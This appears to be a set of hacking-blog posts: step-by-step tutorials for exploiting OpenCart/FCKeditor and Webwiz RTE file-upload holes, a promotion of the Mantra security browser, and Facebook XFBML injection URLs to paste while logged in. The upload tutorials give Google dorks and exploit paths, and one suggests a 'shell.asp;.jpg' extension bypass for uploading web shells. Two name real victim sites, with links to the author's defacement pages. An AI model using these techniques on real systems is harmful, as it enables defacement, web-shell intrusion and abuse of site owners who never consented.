HACK Wordpress Websites | Open Cart CMSFile Upload vulnerability

This is Very Easy Technique Of Exploiting A Wordpress Website by Uploading A Deface Page Or Shell..!!!

1- open Google.com and enter Dork:

inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

or

inurl:Powered By OpenCart

http://www.schoolshopper.com.au/

You'll Got a lot of websites by google, select anyone .

you must have to search a lot to find good fresh vulnerable websites.:P

 For Example i got this one 

Then i'll will simply add the vuln URL after the website 

http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

Example

(The path May be chnaged in other Website , Examplesite.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

Now a Page will be open Like This

Now See The connector option which is on top left side on page, Change The Connector into PHP (see the Image below)

and Now see file upload option and upload your deface or shell

http://www.schoolshopper.com.au/h2b.html

and for checking shell or deface check this url 

www.site.com/deface.html
or
www.site.com/shell.php

Ultimate browser for hackers/penetration testers | mantra security toolkit 0.6.1

Overview

• Mantra is a collection of free and open source tools integrated into a web browser, which can become handy for students, penetration testers, web application developers,security professionals etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software.
• Mantra is lite, flexible, portable and user friendly with a nice graphical user interface. You can carry it in memory cards, flash drives, CD/DVDs, etc. It can be run natively on Linux, Windows and Mac platforms. It can also be installed on to your system within minutes. Mantra is absolutely free of cost and takes no time for you to set up.
  
  
  

  Project Goals

  1. Create an ecosystem for hackers based on browser
  2. To bring the attention of security people to the potential of a browser based security platform
  3. Provide easy to use and portable platform for demonstrating common web based attacks( read training )
  4. To associate with other security tools/products to make a better environment. Eg:
  1. It can be a nice addition to security distribution OSs like OWASP Live CD
  2. It can be used to solve basic levels of CTF contests
  3. It can associate with projects like DVWA to showcase attacks
  4. It can bring functions like crawler, SQL injection scanner etc by installing extensions.
  1. 
     
  
  
  
  
  
  Download here :  
  
  For windows  Here
  
  
  For linux 32bit  Here
  
  

Update Facebook Status in Cool Way i.e. Include HTML VIA XFBML Injection

You will surely be surprised that how this is possible? That I am updating status by adding some text fields where headings are given like “Admin URL” and “Comment Wamiq”. So, today I’ll share that how you too can do it now, this is know as XFBML injection and is actually shared by Acizninja DeadcOde, who is a hacker and I am presenting here by much simplifying it so that you too can make some fun with friends. I’ll just share code using which you will be able to do such things using the application of Acizninja DeadcOde , Since real credits goes to him. Code is below, where a live stream has been created and you can share it as it is at your wall:-

https://www.facebook.com/connect/prompt_feed.php?display=touch&api_key=209403259107231&link=http%3A%2F%2Ft.co%2Fq3EzkPR&
attachment={%27description%27%3A%27%3Cfb%3Alive-stream+event_app_id%3D%22266225821384%22+width%3D%22400%22+
height%3D%22500%22+xid%3D%22%22+via_url%3D%22http%3A%2F%2Ft.co%2Fq3
EzkPR%22+always_post_to_friends%
3D%22false%22%3E%3C%2Ffb%3Alive-stream%3E+%27}

Just copy the whole snippet, log in into your Facebook and then paste that into browser bar, You will see window like this and hit share!

Likely, if you are sharp enough by looking at the above given code you can understand that what is going on. Well, as another sample use below code:-

https://www.facebook.com/connect/prompt_feed.php?&api_key=
209403259107231&attachment={%27name%27%3A%27+%3Ccenter%
3E%3Cfb%3Aeditor-text+label%3D%22Sharing+URL%22+name%3D%
22title%22+value%3D%22+http%3A%2F%2Fhackersthirst.com%22%2F%3E
%3C%2Fbr%3E%3Ccenter%3E%3C%2Fcenter%3E%3Cfb%3Aeditor-textarea+label%3D%22Description%22+name%3D%22comment%
22+value%3D%22+JEMPOL%22%2F%3E%3Ccenter%3E%3C%2Fcenter%
3E%3Cfb%3Aeditor-textarea+label%3D%22Do%20you%20like%20it?%22+name%3D%22comment%22+value%3D%22+JEMPOL%22%2F%3E%3
Cfb%3Aeditor-buttonset%3E%3Ccenter%3E%3Cbutton+type%3D%22button
%22%3EComment%3C%2Fbutton%3E%3C%2Fcenter%3E%27} 

Its preview will be generated like this:-

So, where you find hackersthirst.com in the code you can change it to your desired one, similarly you can fill the empty fields also, by using some coding. So, Use the code and share what you want with the friends and amaze them. You can change the alignment of the “Comment” button in above code, you can change the text of the comment button, all this is up to you. Just cope code and paste that to browser address bar and hit enter. ENJOY.. :)

Website hacking: RTE Webwiz Vulnerability

Hey guys this a very short tutorial , actually its a RTE exploit -file upload vulnerbility of Webwiz websites .
Webwiz rich text editor HTML code is carried in the open after they are sent charCode due functioning of the page .

Google Dorks: 

these dorks will help you to find vulnerable websites

inurl:rte/my_documents/my_files

inurl:/my_documents/my_files/ 

Exploit: 

site.com/rte/RTE_popup_file_atch.asp
site.com/admin/RTE_popup_file_atch.asp


FOR example:

http://www.eden4flowers.co.uk     is a Vulnerable site

Preview after uploading an HTML page

you can also upload a shell or directly your deface page shell format:- shell.asp;.jpg


My hacked page:

http://www.eden4flowers.co.uk//my_documents/my_files/h2b.html

Note: use this at your own risk coz many websites are now already infected by backdoors.

thnxx for reading it..:)